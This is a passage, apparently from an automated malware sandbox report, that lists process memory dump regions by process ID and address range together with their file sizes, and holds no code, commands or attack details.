                                                                                                                                                                                                                                                                                                                              • memory/3760-303-0x0000000005AB0000-0x0000000005AB1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                              • memory/3760-290-0x0000000005A70000-0x0000000005A71000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                              • memory/3760-278-0x00000000020A0000-0x00000000020A1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                              • memory/3760-300-0x0000000005AA0000-0x0000000005AA1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                              • memory/3760-263-0x00000000031C0000-0x00000000031FC000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                240KB

                                                                                                                                                                                                                                                                                                                              • memory/3760-294-0x0000000005A80000-0x0000000005A81000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                              • memory/3760-461-0x0000000005B60000-0x0000000005B61000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                              • memory/3760-244-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                              • memory/3760-424-0x0000000005B10000-0x0000000005B11000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                              • memory/3760-307-0x0000000005AC0000-0x0000000005AC1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                              • memory/3760-311-0x0000000005AD0000-0x0000000005AD1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                              • memory/3760-419-0x0000000005B00000-0x0000000005B01000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                              • memory/3760-296-0x0000000005A90000-0x0000000005A91000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                              • memory/3760-317-0x0000000005AE0000-0x0000000005AE1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                              • memory/3760-377-0x0000000005AF0000-0x0000000005AF1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                              • memory/3820-479-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                              • memory/3832-225-0x0000000000470000-0x0000000000471000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                              • memory/3832-270-0x0000000005030000-0x0000000005031000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                              • memory/3832-505-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                              • memory/3832-519-0x0000000005A70000-0x0000000005A71000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                              • memory/3832-524-0x0000000005A90000-0x0000000005A91000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                              • memory/3832-516-0x0000000005A60000-0x0000000005A61000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                              • memory/3832-521-0x0000000005A80000-0x0000000005A81000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                              • memory/3832-164-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                              • memory/3832-512-0x00000000020A0000-0x00000000020A1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                              • memory/3832-514-0x0000000005A50000-0x0000000005A51000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                              • memory/3956-412-0x0000000002B00000-0x0000000002C05000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                1.0MB

                                                                                                                                                                                                                                                                                                                              • memory/3956-242-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                              • memory/4012-240-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                              • memory/4072-295-0x00000000005F0000-0x00000000005F1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                              • memory/4072-340-0x0000000005AB0000-0x0000000005AB1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                              • memory/4072-190-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                              • memory/4136-256-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                              • memory/4140-359-0x0000000002600000-0x0000000002630000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                192KB

                                                                                                                                                                                                                                                                                                                              • memory/4140-181-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                              • memory/4164-273-0x0000000004F00000-0x0000000004F01000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                              • memory/4164-227-0x0000000000420000-0x0000000000421000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                              • memory/4164-180-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                              • memory/4240-345-0x0000000002470000-0x000000000249F000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                188KB

                                                                                                                                                                                                                                                                                                                              • memory/4240-191-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                              • memory/4448-247-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                              • memory/4448-259-0x00000000007B0000-0x00000000007B3000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                12KB

                                                                                                                                                                                                                                                                                                                              • memory/4464-464-0x00000000023C0000-0x00000000023C2000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                8KB

                                                                                                                                                                                                                                                                                                                              • memory/4464-182-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                              • memory/4464-252-0x00000000008C0000-0x00000000008DC000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                112KB

                                                                                                                                                                                                                                                                                                                              • memory/4464-212-0x0000000000200000-0x0000000000201000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                              • memory/4472-388-0x0000000002580000-0x0000000002589000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                36KB

                                                                                                                                                                                                                                                                                                                              • memory/4472-258-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                              • memory/4532-146-0x00000000040A0000-0x00000000041DF000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                1.2MB

                                                                                                                                                                                                                                                                                                                              • memory/4600-329-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                              • memory/4600-333-0x0000000000400000-0x0000000000409000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                36KB

                                                                                                                                                                                                                                                                                                                              • memory/4656-446-0x00000000049C0000-0x00000000052E6000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                9.1MB

                                                                                                                                                                                                                                                                                                                              • memory/4656-183-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                              • memory/4700-320-0x00000000053F0000-0x00000000053F1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                              • memory/4700-162-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                              • memory/4700-285-0x0000000000D60000-0x0000000000D61000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                              • memory/4700-336-0x0000000005260000-0x0000000005261000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                              • memory/4812-217-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                              • memory/4912-395-0x0000000005160000-0x0000000005778000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                6.1MB

                                                                                                                                                                                                                                                                                                                              • memory/4912-344-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                              • memory/5024-281-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                              • memory/5140-495-0x0000000004BC0000-0x0000000004BC1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                              • memory/5140-439-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                              • memory/5204-361-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                              • memory/5228-366-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                              • memory/5364-489-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                              • memory/5364-498-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                80KB

                                                                                                                                                                                                                                                                                                                              • memory/5428-379-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                              • memory/5464-440-0x00000000027C0000-0x00000000027C2000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                8KB

                                                                                                                                                                                                                                                                                                                              • memory/5464-382-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                              • memory/5480-480-0x0000000004D30000-0x0000000005348000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                6.1MB

                                                                                                                                                                                                                                                                                                                              • memory/5480-409-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                              • memory/5500-383-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                              • memory/5560-386-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                              • memory/5576-508-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                80KB

                                                                                                                                                                                                                                                                                                                              • memory/5576-503-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                              • memory/5632-488-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                              • memory/5876-413-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                              • memory/5900-492-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                              • memory/5976-538-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                              • memory/6032-423-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                              • memory/6100-431-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                              • memory/6124-500-0x0000000000000000-mapping.dmp